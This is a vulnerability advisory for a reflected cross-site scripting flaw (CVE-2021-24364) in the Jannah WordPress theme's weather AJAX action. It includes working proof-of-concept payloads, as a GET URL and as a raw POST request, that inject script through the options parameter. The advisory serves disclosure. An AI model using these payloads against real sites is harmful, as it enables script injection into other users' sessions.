Jannah < 5.4.4 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24364

Description

The theme did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.

Proof of Concept

via GET: https://jannah.tielabs.com/demo/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5\"><img+src=x+onerror=alert(document.domain)>'%2C'custom_name'%3A'Cairo'%2C'animated'%3A'true'%7D

via POST:

POST /demo/wp-admin/admin-ajax.php HTTP/1.1
Host: jannah.tielabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 195
Connection: close

action=tie_get_user_weather&options=%7B'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5\"><img+src=x+onerror=alert(document.domain)>'%2C'custom_name'%3A'Cairo'%2C'animated'%3A'true'%7D